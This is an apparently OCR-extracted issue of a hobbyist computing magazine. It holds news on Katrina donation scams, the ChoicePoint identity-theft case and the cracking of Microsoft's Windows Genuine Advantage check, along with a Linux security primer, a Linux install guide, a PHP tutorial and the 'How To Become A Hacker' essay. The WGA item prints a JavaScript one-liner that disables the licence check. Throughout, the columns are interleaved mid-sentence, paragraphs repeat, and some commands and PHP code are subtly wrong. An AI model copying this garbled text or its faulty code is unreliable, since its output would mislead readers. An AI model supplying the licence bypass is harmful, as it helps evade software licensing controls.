been an unwitting participant in some worm
attacks has the search engine now rejecting
some queries for security reasons, Long said.
"Recently, they've stepped into the game."
bOnline scammers ChoicePoint hacker
exploiting Katrina indicted
disaster The man who received 16 months jail time for
dealing in personal information taken from
Internet criminals wasted no time in exploiting the ChoicePoint has now also been indicted for
hurricane Katrina disaster, immediately fraudulently accessing consumer financial records.
orchestrating online donation scams and sending
malicious email. Nigerian Oluwatunji Oluwatosin could face up to 22
years in prison if convicted of the new crimes.
Prosecutors believe 1,500 people were affected by the
so-called data theft with up to 150,000 others also at
risk.

"The 22-count grand jury indictment unsealed today

represents one of the largest cases of identity theft
ever prosecuted in Los Angeles County," said Los
Angeles County District Attorney Steve Cooley
speaking to Reuters.

In March SC reported consumer data-mining company

ChoicePoint had informed 35,000 Californians their
data could have been compromised, as part of the new
disclosure law Californian Senate Bill 1386.
A widespread spam campaign pretends to offer breaking
Over the next month a wave of industry and privacy
news about the hurricane, which struck the Gulf Coast
pressure forced the embattled company to reveal the
region earlier this week. The spam tries to lure users to a
full extent of the security breach. Eventually CEO
bogus website that could infect their PCs with malicious
Derek Smith apologized for his company's lack of
code, according to anti-virus supplier Sophos.
security to a House Energy and Commerce
Subcommittee.
"Once infected, the computer is under the control of the
remote criminal hackers who can use it to spy, steal or
According to reports, the U.S. government is
cause disruption," Gregg Mastoras, Sophos senior
widening its search for the culprits that targeted
security analyst, said in a statement.
ChoicePoint and there may soon be more arrests.
The SANS Internet Storm Center said users should also
watch out for fake emails and domains being used to
collect donations for hurricane victims.

In addition to getting money through fake foundations,

the fraudulent domains can steal user names and
passwords and lead users to install malicious software
on their PCs, according to a posting on the storm
center's site.
Hackers Crack Microsoft's Antipiracy
System
Windows Genuine Advantage system first exploited within 24 hours of its launch.

Microsoft says that hackers managed to bypass a process Easy Hack?

it had implemented several days ago to ensure that users
of Microsoft's update services possessed legitimate
copies of Windows before they could download updates
and content from those services.
A posting on the Boing Boing blog claimed that a
JavaScript command string could bypass a check that
Microsoft instituted Wednesday through the Windows
Genuine Advantage 1.0 program.
According to the posting, users can override the WGA
by pasting the string
javascript:void(window.g_sDisableWGACheck='all') in
the address bar of their browser and pressing Enter. The
code "turns off the trigger for the key check," according
to the blog posting.
Quick Work
The Boing Boing hack is not the only way to get around
WGA's restrictions.
David Keller, founder of PC consulting and services
firm Compu-Doctor in Cape Coral, Florida, was able to
change his Internet Explorer settings to bypass WGA
when he ran into a flaw in the program that flagged a
legitimate product key on a customer's Windows XP
Professional Service Pack 2 as invalid.
"The customer was the original owner, no hardware was
changed since purchase, nor was Windows ever
reinstalled on the system," Keller said in an e-mail to the
IDG News Service. WGA had rejected the operating
system, nevertheless, thereby preventing Windows
Update from working, he said.

The WGA program requires users to run a program

verifying that their Windows operating system is not
pirated, before they can use Microsoft's software update
services. Microsoft had been running it as a pilot
program since September 2004 but made the validation
system a requirement just last Wednesday.
Keller wrote that he did not have much luck with
A Microsoft spokesperson conceded on Friday that Microsoft support technicians, so he found a way to
hackers had indeed succeeded in cracking the WGA bypass the validation process on his own and moved
program, but said that the software giant will fix the along with the update. He accomplished this by
flaw they exploited in an upcoming version of the WGA disabling the Windows Genuine Advantage add-on
program. within his browser's Internet Options. By clicking on
Tools/Internet Options/Programs/Manage Add-ons,
The exploit came soon after Wednesday's launch of the Keller disabled the WGA add-on. He then exited
program, the spokesman said. "Within 24 hours, hackers Internet Explorer and was able to do a Windows Update
claimed to have circumvented the process and it appears without completing the validation step.
that they did," he said. "This is a hack that exploits a
feature that enables repeat downloads in the same
session so that a hacker never has to validate as a
genuine user," he said. Source:

The move to lock out pirated copies of Windows from

the update sites is part of Microsoft's effort to fight
software piracy, a major issue for the software vendor.
 The Basics of Linux Network Security
Introduction
The Internet has become a hazardous place, in the last few
Averting
years. As the Break-Ins
traffic increases and more important
transactions are taking place your risk grows as bad guys
try to damage, intercept, steal or alter your data.
If there is something worth stealing then someone will try
and steal it. Linux-based systems have no special
exclusion from this universal rule. A primary reason that
Linux systems are so popular is because they are robust
and have many sophisticated security measures.
As the manager of a Linux system for your department or
small business, you might feel a bit daunted by all of these
threats. You've heard Linux is supposed to be secure, but
how do you make sure?
It is a truism, of course, that if you don't use the Linux
security tools provided, then you should be ready for the
inevitable break-in. Problems can also be caused by badly
implemented security measures. Securing a Linux machine
can get pretty complicated and entire shelves of books
have been dedicated to the subject.
You may not have the time or the motivation to delve into
all of those tomes, so we're going to make this a bit
simpler.
There are several methods remote attackers can use to
break into your machine. Usually they are exploiting
problems with existing programs. The Linux community
always quickly spots these 'exploits' and releases a fix.
Linux fixes are usually out long before the equivalent
programs in other operating systems are mended. The
issue here though is how to prevent your machine from
suffering any sort of problem of this sort.
There are several methods remote attackers can use to
break into your machine. Usually they are exploiting
problems with existing programs. The Linux community
always quickly spots these 'exploits' and releases a fix.
Linux fixes are usually out long before the equivalent
programs in other operating systems are mended. The
issue here though is how to prevent your machine from
suffering any sort of problem of this sort.
Linux as a server offers all kinds of facilities like ftp,
WWW, and mail. The way that it handles many of these
services is via a system of ports. Port 21 controls ftp, for
example. (If you are interested, the mapping of port
numbers to service names is in the file /etc/services.)
To save on system resources and make system
administration less complex, many services are handled
through a configuration file /etc/inetd.conf. This file
tells the system how to run each of the available
services.
Many Linux vendors turn on various services in
inetd.conf by default when for maximum security they
should be off! In many corporate environments security
as such is not an issue. If there is enough security to
prevent accidental damage in these 'soft' environments
providing access to these services is more important
than preventing them. If your Linux host is exposed to
the Internet you may hold a different point of view
though. To check what services are currently running on
your Linux system, type the command
netstat -vat
This will print up something like this
tcp 0 0 *:6000 *:* LISTEN
tcp 0 0 *:www *:* LISTEN
tcp 0 0 *:auth *:* LISTEN
tcp 0 0 *:finger *:* LISTEN
tcp 0 0 *:shell *:* LISTEN
tcp 0 0 *:sunrpc *:* LISTEN
Each line that says LISTEN is a service waiting for
connections.
Some of these services run as stand-alone programs, but
many of them are controlled by /etc/inetd.conf. If you
are not sure what a service does, look it up in
/etc/inetd.conf. For instance, if you type
grep '^finger' /etc/inetd.conf
you will get back a line from inetd.conf like this
finger stream tcp nowait nobody /usr/sbin/tcpd
/usr/sbin/in.fingerd
To see what the program does, look up in.fingerd in the man
page. If you think you can live without this service, then it
can be turned off in /etc/inetd.conf. By commenting out the
line (put a # at the start of the line) and then issuing the
command kill all -HUP inetd you can immediately and
permanently turn a service off. There is no need to reboot.
If a service is not listed in /etc/inetd.conf then it probably
runs as a stand-alone program.
You can remove a service provided by a stand-alone
background program by uninstalling its package. Only do
this if you are sure about what the program does and are
certain that it is not necessary.
Ssh is a stable, well-developed system with open
source that provides encryption and authentication on
connections. Encryption is using codes to protect the
packets of data while in transit. Authentication is a
process for verifying if a.packet of data or a
connection is valid. There are ssh clients for most
other operating systems too. By using Linux as a
server you can provide ssh level security for all your
network use.

Monitoring Programs and Where/What They Log

Linux has a comprehensive set of subsystems to let

the systems administrator know what is going on with
his or her system. All manner of log files are generally
kept in the /var/log directory. Most of the standard
services log information to /var/log/syslog and
/var/log/messages about users connecting to them or
attempting to connect. There are also log files for such
services as apache (/var/log/httpd/access_log), mail
(/var/log/mail) and firewall (/var/log/firewall).

The main problem with logging events is that one

tends to end up with too much data. So careful
filtering and only logging important information is
Keep Out The Prying Eyes With Ssh (Secure Shell important.
System)
There are some good tools out there that will make
To add extra security to the various services, Linux has a this work easier.
system for allowing and denying them to chosen hosts. For
instance, you may wish to allow logins from machines at
Ethereal is a packet sniffer. With it you can capture
your own site, but not from the Internet. The files
various types of packets over a given period of time. It
/etc/hosts.allow and /etc/hosts.deny list allowed services and
also shows all manner of information about the
hosts.
packets. It's useful for watching packets coming into
The method of denying connections by checking the host
and going out of your machine. Generally it will
provides a good basic method for throwing off attacks. But it
detect traffic on your network segment.
is not the end of the story. It is possible to fake host names
on incoming connections ( oh yes it is ). While data is in
transit between programs over the Internet it is also in
danger. Anyone with the knowledge can look at your data.
Using a method known as 'spoofing' they can even inject
fake data into a legitimate stream. These problems come
about because of the way that Internet protocols interact. To
overcome these difficulties ssh was devised.
 Monitoring Programs and Where/What They Log
Stop The Evil Forces Of The Internet With Firewalls

A firewall is a device that protects a private network from

the wider Internet. The simplest form of firewall is a Linux
machine with one network connection ( an Ethernet card
or modem ) connected to the Internet and the other
connected to the private network. The Firewall computer
can reach the protected network and the Internet. This
traffic between the protected network and the Internet is
controlled, in both directions by a list of rules. These rules
can be customized for your needs. CoyoteLinux.com has a
firewall system that fits on a floppy and doesn't need a
Linux has a comprehensive set of subsystems to let the hard disk to run. It's design specifically to address the need
systems administrator know what is going on with his or her for an easy to install no-nonsense Linux firewall.
system. All manner of log files are generally kept in the You might take a look at running a hardware firewall
/var/log directory. Most of the standard services log appliance. These devices are small routers or switches that
information to /var/log/syslog and /var/log/messages about have built-in firewalls. They generally allow limited setup
users connecting to them or attempting to connect. There are of rules to allow packets to pass back and forth. They don't
also log files for such services as apache provide as much flexibility for rules as dedicated Linux
(/var/log/httpd/access_log), mail (/var/log/mail) and firewall firewalls. Usually the availability is good with some even
(/var/log/firewall). being equipped with four or more RJ-45 ports and a
The main problem with logging events is that one tends to wireless access point, all for around $100.
end up with too much data. So careful filtering and only
logging important information is important. All data flowing to and from the Internet and the private
There are some good tools out there that will make this work network is filtered by the firewall. Inside the private
easier. network less care needs to be taken with turning off
services and the like. It is a way of concentrating effort on
Ethereal is a packet sniffer. With it you can capture various making one machine secure and protecting many others in
types of packets over a given period of time. It also shows all the process. The methods for correctly setting up firewalls
manner of information about the packets. It's useful for are quite complex. First you have to configure your
watching packets coming into and going out of your machine for two Ethernet cards. Then you have to use the
machine. Generally it will detect traffic on your network IP-chains/IP-tables software to set up filters which connect
segment. the two Ethernet cards data links.

Another logging/intrusion detection type tool is called
Tripwire. It takes a snapshot of your important system files
and records their signature in a database. Various signature
levels are available from mild to wild. You can also set the
rules in a policy file to tell Tripwire what to check. After the
database is initialized and signed Tripwire can be executed
whenever you need to check the integrity of your system.
The report will point out when your files are changed and the
severity of the security risk. The Tripwire report is pretty
easy to read and can be customized according to your file
tracking needs. Why not set Tripwire up to run every day,
early in the morning and have a report ready to look at, with
your first cup of coffee?
The main drawback with making your systems more
secure is that they become less accessible. The idea behind
ramping up your system's security is to stop use of your
computers, by crooks, thieves and malcontents. Before
implementing any of the ideas in this article you should
consider carefully the opposite side of the coin: the
systems are there to be used by your users! Linux has a
wide range of security tools and by carefully combining
various techniques and programs, you should be able to
come up with a good balance between ready access and
system security.

A popular program for detecting access attempts (via the

network) and port scans is Snort. The program produces files
that log these types of activities and even gives some idea of
where to find out more information. Of course, then you
have the same problem as with other log files. It gets tough
for a busy system administrator to review all the log files on
a regular basis.
 My First Linux Server, Part 1
Easy Linux, Easy
Many small businesses are turning to Linux as way to swim
against the tide of rising software costs. Are you thinking about
diving into Linux for your small business? From the outside,
Linux can appear to be a deep ocean of strange jargon in
unchartered waters. Who has the time to wade through all that
to save a few clams? With Linux, it's not a sink or swim
proposition.
Linux is now a lot simpler than you may think. We can provide
you with the easiest, simplest, no-problem process for
installing Linux on a PC. After going through this simple
installation process, you will have a basic machine that you can
configure into any kind of server, workstation, or office
desktop. Future articles in this My First Linux Server series
will help you build productive, Linux-based servers and small
office workstations.
The best choices for your first Linux machine are probably the
popular Red Hat Linux or SUSE Linux, primarily because both
are easy to install and configure. Additionally, these companies
are sound choices for the home office or small business. Both
vendors have specialized in Linux for many years and offer full
corporate product lines supporting your expansion.
Red Hat, for example, has an extensive library of recent third-
party English documentation, while SUSE is better
documented in European languages. (As recently announced,
Red Hat has discontinued support for Red Hat Linux 9.0, so
security updates will no longer be available. But you can still
learn the basics with version 9.0 and you can upgrade to
supported versions when you need a more secure production
system.)
Step 1: Buy CDs, Please
Linux is set up for CD-ROM installation. Of course,
you can download your Linux software from many
free sources and burn your own CDs. But the
download is big--up to 3 GBs--and it takes time to
burn a full set of CDs. Do it the easy way and
eliminate problems with interrupted downloads or CD
data errors.
Go to eBay and buy good quality CDs from
established sellers like "The Linux Store" and pay
about $1.00 per CD, plus shipping. Or go to Linux CD
and pay about $2.00 a CD plus shipping. You might
have to look carefully to find RedHat here.
At such inexpensive prices, the vendor is making no
money, so you do not qualify for free vendor support.
These are low-end products, but they do contain all
the small business server and office software you need
to get started. If you need or want someone to call on
in case of technical difficulties, pay more and buy
from Red Hat, SUSE, or other established Linux
vendors.
Step 2: Prepare the Box
Any leftover, surplus, outmoded, underpowered PC is
perfect for your first Linux server project. Linux runs
on any Intel 386, 486, Pentium (called i586), Pentium
II (called i686) and newer platforms, as well as many
other CPUs. 128 MB RAM is quite adequate for a test
system, and you will need around 10GB of hard disk
space. The purpose of this exercise is to quickly build
a Linux platform and then learn the basics of
configuring a useful small business server. Then you
can repeat the process on larger, faster platforms for
go into heavy server production.
While you wait for the CD shipment to arrive, it is
well worth it to clean up the PC as much as possible.
You can keep Windows applications intact if you
wish, and you will be able to use this computer for
both Windows and Linux. Minimize the Windows
footprint on the system by removing all unnecessary
applications and files, and back up any files you might
need later. Clean up the registry, defragment the disks
and run a careful virus scan.
Also note that you may need Linux drivers for some
of the cards and devices you have installed, so make a
paper list of manufacturers and model numbers of all
of the cards, CD drives, hard disks and motherboard.
(Note that a driver is just a small piece of software
that links the operating system to other devices such
as printers and hard disks). The Linux CDs probably
have the correct drivers for these devices, but if you
need to search for a Linux driver, the list comes in
handy.
The Linux installation starts by booting from a CD, so the CD-
ROM drive must be the first boot source your computer looks for.
This may entail changing some settings in what is called the
BIOS—Basic Input/Output System--this can be likened in some
ways to the starter motor in a car. The BIOS is what makes a
turned off computer come to life. Go into the BIOS settings and
change the boot sequence to put the CD-ROM drive first. It may
sound complex, but it is relatively simple. If this gives you any
trouble, any somewhat technically inclined associate should be
able to sort it out for you in 30 seconds.
Step 3: Install First CD
Load up the Linux! Place the first Linux CD in the drive and
reboot the computer. When the screen comes up, you know Linux
has found drivers for your monitor, video board, and keyboard.
The installer program sequences are different for each vendor,
but SUSE and Red Hat give you a workable system if you choose
the default settings and keep it simple. Later, after some
experience, you can optimize the system for workstation or server
use.
Step through the screens and selections, taking the default
settings and simplest choices. Read the Help text for each screen
to get familiar with configurations. The keys to keeping things
simple are:
Step 4: Feed CDs and Enjoy
There is no user interaction for these CDs--just
insert the next CD and go do something more
productive than watching software copying. After
all of the applications load, the installer program
takes you through a few easy configuration screens.
Finally, the system reboots and brings up the boot
selection screen. If you selected Linux to be the
default OS; the new login screen automatically
appears.
Congratulations, Linux is live! Take some time to
get familiar with the new look and layout of a Linux
system. Explore the configuration tools, and surf the
Linux sites. The adventure begins.
In the second article in this series next week, we
will configure the PC to perform as simple file
server suitable for home office and small business
networks.

• Accept default selections when in doubt

• Install all the software

Points to watch for Red Hat: Choose "Custom" to allow installing

all software, but when you see the Disk Partitioning Setup screen,
be sure to choose "Automatic Partition." Points to watch for
SUSE: Accept the disk-partitioning proposal. For software
selection, choose "Detailed Selection" and select all software.
And please, remember to write down your IDs and passwords,
because it is not easy for the novice to re-set them.
There is a final choice of whether to proceed with the installation
or cancel it. Until this point, nothing has been written to disk, and Look out for future issues of WareZ News
you can cancel out of the installation without changing the disks Magazine to learn more about linux!
in any way. You can cancel right now and go back through the
installation again, choosing different options. When you finally
summon the courage to make that last click, the disk partitioning
and data writes begin. The installer program does an automatic
reboot and then requests the remaining CDs to finish the install
process.
 The easy way to learn PHP
-part 1 –
What is PHP?
PHP is an interpretted language that has similarities to C. PHP
scripts are written and typically saved with a file extension of
.php . These PHP scripts can be run by a webserver (i.e.
MicroSoft Internet Information Services or Apache) for use on
a web page, or from the command line if PHP is configured
this way.
An example of PHP in use is on this webpage. If you look at
the URL address of this page, you will notice the following:
www.vcvtech.com/index.php
The file, index.php, is a PHP script that helps serve the pages
of the website.
What do I need to program with PHP?
In order to program with PHP, you will need a good text editor
- preferably one that recognizes when PHP code is being
typed. These 'PHP aware' editors allow for the user to easily
distinguish between PHP code, and other types of code, such as
Javascript or HTML, typically by color coding and bolding the
text of each type, differently. A good example of a freeware
editor is HTML-Kit (www.chami.com), which was used for a
majority of the programming work on this website.
It is also recommended that you have access to PHP by
installing it with a webserver, either on a Linux system, or a
MicroSoft Windows-based workstation. Better yet, use a web
hosting provider that provides PHP as one of its services with it
web hosting package. It is easy and useful to learn PHP in
conjunction with MySQL, and Apache or IIS, which is
typically available with web hosting services.
What kind of programs can I create with PHP?
PHP is typically used in conjunction with a web server and a
database, such as Apache (www.apache.org) and MySQL
(www.mysql.org), in order to assist in displaying dynamic web
pages.
PHP has been used to create shopping carts, address
books, photo galleries, contact lists, catalogs, user
forums, and many other types of content on the
web. The uses of PHP are endless. Since PHP can
also be run from the command-line, it is possible to
use PHP to do server administrative tasks, or run
PHP scripts from cronjobs.
PHP Examples
To give you an idea of what the PHP language
looks like, as mentioned, it looks similar to C, as it
requires a semi-colon to close each command line
of code. The characters (together they're called a
tag) open and close your PHP script, which may be
contained in a text file by itself, or in the middle of
some HTML code. These tags tell the web server to
begin translating PHP code. An example of PHP is
listed below:
<? echo "Hello World";?>
The example script above, if it were saved in a file
and called upon by the webserver, it would display
"Hello World" on an otherwise blank page.
if...Then statements look like the following:
<?
$flag = $_POST["answer"];
if($flag==true) {
echo "It is TRUE!!!";
} else {
echo "It is absolutely, FALSE!!! Get out of here
and don't come back till it is TRUE!!!";
}
?>
The above example leaned a bit toward the dramatic
side, but illustrates how closely PHP resembles C.
It is of the author's opinion that if a programmer is
proficient in C, of which many of PHP's commands
are copies of, then PHP should be easy to learn by
that programmer. Otherwise, PHP is still a good
language to learn, but it is advised that as one first
begins to learn PHP, that he or she has a good tutor
or book to refer to in order to avoid getting
into bad habits, such as creating spaghetti code
that lumps all of a programs functionality into one
long script, instead of segregating it into seperate,
re-usable functions. The topic of PHP writing style
is beyond the scope of this article, but will be
covered in another tutorial.
 What other resources are available to learn
PHP?
The web is full of resources to be looked up to learn
programming PHP. PHP's official site, www.php.net has a
searchable index of all of PHP's commands, and there are
dicussions posted with each command, that give further
details and examples of the command's usage. Other
websites worth taking a look at include the following:
www.devshed.com
www.w3schools.com
www.php-scripts.com
www.phpbuddy.com
www.webmonkey.com
This list should be enough to get you started.
The Basics of PHP
In order to use PHP, you must learn some basic syntax of
how PHP is used. This article is not a beginner’s guide to
programming. It is assumed that the reader has some
previous programming experience with other languages such
as BASIC, C, or Fortran. Nonetheless, it may be possible for
the quick learner to learn
how to program with PHP, by reading and utilizing
examples.
PHP Variables
The syntax used for variables in PHP requires
that variable names be preceeded by a dollar
sign($). Variable names can start with a letter or
underscore, and may have numbers,letters, or
underscores, following. Variable names in PHP
are case sensitive – an important point to
remember if you’re modifying some PHP code.
Variables are assigned values by using the ‘equal’
sign – a standard practice in most common
programming languages. For example, to set $a
to equal ‘5’:
$a = ‘5’;
We may set $b to equal 5.
$b= 5;
PHP decides the type of variable depending upon
the value that is being assigned. Addition of $a +
$b results in an error. However, if you are
performing a string function, such as
concactenation, PHP automatically converts
numeric variables to strings.
Concactenation within PHP is simple, as it only
requires a period(.) between the strings being
concactenated. For example:
$string = $a.” + “.$b;
A string may also be concactenated using the
following convention:
$string .= $a;
$string .= “ is the value of a”;
A numeric variable may be similarly be
incremented as demonstrated:
$number++;
or use
$number+=$b;
Finally, it should be mentioned that PHP variables may be set
to values, or references to other variables that are already set
with values. These are considered reference variables, similar
to those used in the C language, in which the variable doesn’t
actually contain the value of the variable it is pointing to, but it
is only JUST a pointer or reference. You can also consider it
an alias of the variable, as a another means to describe it. By
using reference variables, such as when pointing to an array or
a object (objects will be discussed in another tutorial), the
whole array or object doesn’t have to be copied again – rather
the reference variable points at the variable’s location in
memory (Remember, it is memory, typically RAM, that
contains all your variables, besides your PHP code when you
run your PHP script!).
PHP Arrays
PHP arrays are used very similarly to those in BASIC, except
you do not need to dimension them in advance. PHP also
provides an immense number of array functions, that provide
great power to their usage. Volumes could be written on the
various uses of PHP arrays, but it is probably better to
reference www.php.net/arrays to gather more information on
more complex topics of arrays, that will not be covered in this
basic tutorial.
PHP arrays are already set to receive an infinite number of
items. The syntax for setting your PHP array is as follows:
$my_array[0] = “This is a test”;
Interestingly, values may be appended to this array by using
two closed, empty brackets as shown by the following:
$my_array[] = “This is another test”;
$my_array[]=”Hey Mom, isn’t this cool?!”;
PHP will append a value to the next available slot of your
array. PHP maintains an index of each array.
A useful function to view the contents of an array is print_r, as
seen below:
print_r($my_array);
Output:
$my_array Array( [0]=>”This is a test”;[1]=>”This is
another test”;[2]=>”Hey Mom, isn’t this cool?!”;)
Notice that print_r displays the key value of the
array followed by the value itself (i.e. the key
value of 0, is between the brackets, listed as [0]).
It is interesting to note that PHP arrays can have
key values that are non-numeric. For example,
you can set the following array:
$my_new_array[‘test’] = “this is a test”;
If you do a print_r, you will see that [‘test’]
appears as a key value. One of the greatest
attributes of PHP is that it allows you to create
keys from words so that your keys can have
descriptive meanings or be more easily linked to
fields in a database or from $_POST data from a
form.
If you use closed brackets after your array names,
and do not specify a key value when inserting
values into the array, you should be aware of the
pitfalls you may encounter. PHP Array pitfalls
will be covered in the next chapter.
PHP Array Pitfalls To Avoid
I was helping an up an coming PHP developer at
the office the other day - it happened to be his
birthday and he was in a hurry to leave for a
dinner engagement with his family.
Unfortunately, he was wrestling with PHP and its
handling of arrays. I recognized the problem
immediately, recounting my own experiences
with getting $_POST data from a form with
checkboxes and several text input fields, and
expecting the data to line up perfectly with some
corresponding data from a MySQL database.
The reason he was experiencing a problem was
that as he was having data input into a form on
his website into an HTML array variable called
data[] , he was hoping that the 3rd instance of the
field on his form would also be put into the 3rd
slot of his PHP array, which he called
$formdata[] .
Unfortunately, when you have a closed bracket
array, items are added to the next available
indexed key value of the array. This is true for
both HTML and PHP. Thus, if he had 3 fields on
his form using data[], and when the HTML is
displayed in the browser, the user fills in the 3rd
field on the form, data[0] will contain the value -
not data[3]. Therefore, if you want to retrieve
data from a form with array variables, it is better
to specify the key each array.
An example in which an array would be used on a form and
then used by PHP is listed below, in which we have an online
quiz form. PHP IF... THEN Statements
<HTML>
<BODY> To use IF..THEN.. and ELSE within PHP, the
<FORM name="form" method="post" following example is provided, in which we will
action="process.php"> test to see if a variable $flag is set to TRUE.
<H4>What is my favorite food(s)? (Check all that
apply)</H4> if ($flag == TRUE) {
<a>Cheeseburger? A.<input name="answers[A]" echo “The flag is set to TRUE”;
type="checkbox"></a><BR> } else {
<a>Hot Dots? B.<input name="answers[B]" echo “The flag is not set to
type="checkbox"></a><BR> TRUE”;
<a>Tacos? C.<input name="answers[C]" }
type="checkbox"></a><BR>
<a>Chicken? D.<input name="answers[D]" Notice that we used a double equal sign as a
type="checkbox"></a><BR> comparison operator. PHP requires this syntax as it
<button type="submit">Submit</button> would consider $flag=TRUE to mean that we’re
</FORM> trying to set the variable instead of performing a
</BODY> condition. For more information on PHP’s
<HTML> comparison operators, click here to reach the
The PHP script that retrieves and processes the information is ‘comparison operator’ section of the PHP manual at
below: www.php.net.
<?
$correct_answers_array = array("A","B");
$answerstring=implode(",",$correct_answers_array); More in the next issue!
$correct_flag= true;
$posted_answers = $_POST['answers'];
foreach($posted_answers as $key=>$value) {
if ($correct_flag != False ) {
$correct_flag = True;
}
if (!in_array($key,$correct_answers_array )) {
$correct_flag = false;
echo "false";
} else {
unset($posted_answers['$key']);
}
}
if ($correct_flag==True and
count($_POST['answers'])==count($correct_answers_arra
y)) {
echo "YOU 100% RIGHT!<br>";
} else {
echo "You were not 100% correct…I’m very
disappointed in you.<BR>";
echo "The correct answer should have been
".$answerstring.".<BR>";
} ?>
 How To Become A Hacker
What Is a Hacker?
The Jargon File contains a bunch of definitions
of the term "hacker", most having to do with
technical adeptness and a delight in solving
problems and overcoming limits. If you want to
know how to become a hacker, though, only two
are really relevant.
There is a community, a shared culture, of expert
programmers and networking wizards that traces
its history back through decades to the first time-
sharing minicomputers and the earliest ARPAnet
experiments. The members of this culture
originated the term 'hacker'. Hackers built the
Internet. Hackers made the Unix operating
system what it is today. Hackers run Usenet.
Hackers make the World Wide Web work. If you
are part of this culture, if you have contributed to
it and other people in it know who you are and
call you a hacker, you're a hacker.
The hacker mind-set is not confined to this
software-hacker culture. There are people who
apply the hacker attitude to other things, like
electronics or music --- actually, you can find it
at the highest levels of any science or art.
Software hackers recognize these kindred spirits
elsewhere and may call them 'hackers' too --- and
some claim that the hacker nature is really
independent of the particular medium the hacker
works in. But in the rest of this document we
will focus on the skills and attitudes of software
hackers, and the traditions of the shared culture
that originated the term 'hacker'.
There is another group of people who loudly call
themselves hackers, but aren't. These are people
(mainly adolescent males) who get a kick out of
breaking into computers and phreaking the
phone system. Real hackers call these people
'crackers' and want nothing to do with them. Real
hackers mostly think crackers are lazy,
irresponsible, and not very bright, and object that
being able to break security doesn't make you a
hacker any more than being able to hotwire cars
makes you an automotive engineer.
Unfortunately, many journalists and writers have
been fooled into using the word 'hacker' to
describe crackers; this irritates real hackers no
end.
The basic difference is this: hackers build things,
crackers break them.
If you want to be a hacker, keep reading. If you
want to be a cracker, go read the alt.2600
newsgroup and get ready to do five to ten in the
slammer after finding out you aren't as smart as
you think you are. And that's all I'm going to say
about crackers.
The Hacker Attitude
Hackers solve problems and build things, and
they believe in freedom and voluntary mutual
help. To be accepted as a hacker, you have to
behave as though you have this kind of attitude
yourself. And to behave as though you have the
attitude, you have to really believe the attitude.
But if you think of cultivating hacker attitudes as
just a way to gain acceptance in the culture,
you'll miss the point. Becoming the kind of
person who believes these things is important for
you --- for helping you learn and keeping you
motivated. As with all creative arts, the most
effective way to become a master is to imitate
the mind-set of masters --- not just intellectually
but emotionally as well.
Or, as the following modern Zen poem has it:
To follow the path:
look to the master,
follow the master,
walk with the master,
see through the master,
become the master.
So, if you want to be a hacker, repeat the
following things until you believe them:
1. The world is full of fascinating
problems waiting to be solved.
Being a hacker is lots of fun, but it's a kind of
fun that takes lots of effort. The effort takes
motivation. Successful athletes get their
motivation from a kind of physical delight in
making their bodies perform, in pushing
themselves past their own physical limits.
Similarly, to be a hacker you have to get a basic
thrill from solving problems, sharpening your
skills, and exercising your intelligence.
If you aren't the kind of person that feels this
way naturally, you'll need to become one in
order to make it as a hacker. Otherwise you'll
find your hacking energy is sapped by
distractions like sex, money, and social approval.
You also have to develop a kind of faith in your
own learning capacity --- a belief that even
though you may not know all of what you need
to solve a problem, if you tackle just a piece of it
and learn from that, you'll learn enough to solve
the next piece --- and so on, until you're done.)2.
No problem should ever have to be solved
twice.
Creative brains are a valuable, limited resource.
They shouldn't be wasted on re-inventing the
wheel when there are so many fascinating new
problems waiting out there.
To behave like a hacker, you have to believe that
the thinking time of other hackers is precious --
so much so that it's almost a moral duty for you
to share information, solve problems and then
give the solutions away just so other hackers can
solve new problems instead of having to
perpetually re-address old ones.
(You don't have to believe that you're obligated
to give all your creative product away, though
the hackers that do are the ones that get most
respect from other hackers. It's consistent with
hacker values to sell enough of it to keep you in
food and rent and computers. It's fine to use your
hacking skills to support a family or even get
rich, as long as you don't forget your loyalty to
your art and your fellow hackers while doing it.)
3. Boredom and drudgery are evil.
Hackers (and creative people in general) should
never be bored or have to drudge at stupid
repetitive work, because when this happens it
means they aren't doing what only they can do --
- solve new problems. This wastefulness hurts
everybody. Therefore boredom and drudgery are
not just unpleasant but actually evil.
To behave like a hacker, you have to believe this
enough to want to automate away the boring bits
as much as possible, not just for yourself but for
everybody else (especially other hackers).
(There is one apparent exception to this. Hackers
will sometimes do things that may seem
repetitive or boring to an observer as a mind-
clearing exercise, or in order to acquire a skill or
have some particular kind of experience you
can't have otherwise. But this is by choice ---
nobody who can think should ever be forced into
a situation that bores them.)
4. Freedom is good.
Hackers are naturally anti-authoritarian. Anyone
who can give you orders can stop you from
solving whatever problem you're being
fascinated by --- and, given the way authoritarian
minds work, will generally find some appallingly
stupid reason to do so. So the authoritarian
attitude has to be fought wherever you find it,
lest it smother you and other hackers.
(This isn't the same as fighting all authority.
Children need to be guided and criminals
restrained. A hacker may agree to accept some
kinds of authority in order to get something he
wants more than the time he spends following
orders. But that's a limited, conscious bargain;
the kind of personal surrender authoritarians
want is not on offer.)
Authoritarians thrive on censorship and secrecy.
And they distrust voluntary cooperation and
information-sharing --- they only like
'cooperation' that they control. So to behave like
a hacker, you have to develop an instinctive
hostility to censorship, secrecy, and the use of
force or deception to compel responsible adults.
And you have to be willing to act on that belief.
5. Attitude is no substitute for
competence.
To be a hacker, you have to develop some of
these attitudes. But copping an attitude alone
won't make you a hacker, any more than it will
make you a champion athlete or a rock star.
Becoming a hacker will take intelligence,
practice, dedication, and hard work.
Therefore, you have to learn to distrust attitude
and respect competence of every kind. Hackers
won't let posers waste their time, but they
worship competence --- especially competence at
hacking, but competence at anything is good.
Competence at demanding skills that few can
master is especially good, and competence at
demanding skills that involve mental acuteness,
craft, and concentration is best.
If you revere competence, you'll enjoy
developing it in yourself --- the hard work and
dedication will become a kind of intense play
rather than drudgery. That attitude is vital to
becoming a hacker.
Basic Hacking Skills
The hacker attitude is vital, but skills are even
more vital. Attitude is no substitute for
competence, and there's a certain basic toolkit of
skills which you have to have before any hacker
will dream of calling you one.
This toolkit changes slowly over time as
technology creates new skills and makes old
ones obsolete. For example, it used to include
programming in machine language, and didn't
until recently involve HTML. But right now it
pretty clearly includes the following:
1. Learn how to program.
This, of course, is the fundamental hacking skill.
If you don't know any computer languages, I
recommend starting with Python. It is cleanly
designed, well documented, and relatively kind
to beginners. Despite being a good first
language, it is not just a toy; it is very powerful
and flexible and well suited for large projects. I
have written a more detailed evaluation of
Python. Good tutorials are available at the
Python web site.
Java is also a good language for learning to
program in. It is more difficult than Python, but
produces faster code than Python. I think it
makes an excellent second language.
But be aware that you won't reach the skill level
of a hacker or even merely a programmer if you
only know one or two languages --- you need to
learn how to think about programming problems
